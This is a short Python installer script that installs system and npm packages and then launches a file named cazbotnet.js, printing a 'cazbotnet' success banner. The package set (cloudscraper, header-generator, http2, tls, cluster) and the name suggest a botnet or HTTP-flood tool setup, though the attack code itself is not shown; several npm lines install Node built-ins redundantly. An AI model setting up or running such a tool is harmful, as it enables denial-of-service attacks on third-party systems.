import os
import sys

os.system('pip3 install -U trio')
os.system('apt install openjdk-17')
os.system('apt install nodejs-lts')
os.system('apt install qb64')
os.system('npm install net')
os.system('npm install cluster')
os.system('npm install https')
os.system('npm install tls')
os.system('npm install http2')
os.system('npm install fs')
os.system('npm install cloudscraper')
os.system('npm install request')
os.system('npm install URL')
os.system('npm install https')
os.system('npm install net')
os.system('npm install crypto')
os.system('npm install axios')
os.system('npm install request')
os.system('npm install header-generator')
os.system('npm install childProcess')
os.system('node cazbotnet.js')
print(f"\x1b[31m[\x1b[33mcazbotnet\x1b[31m]\x1b[0m \x1b[32m> \x1b[33mInstallation Successful")
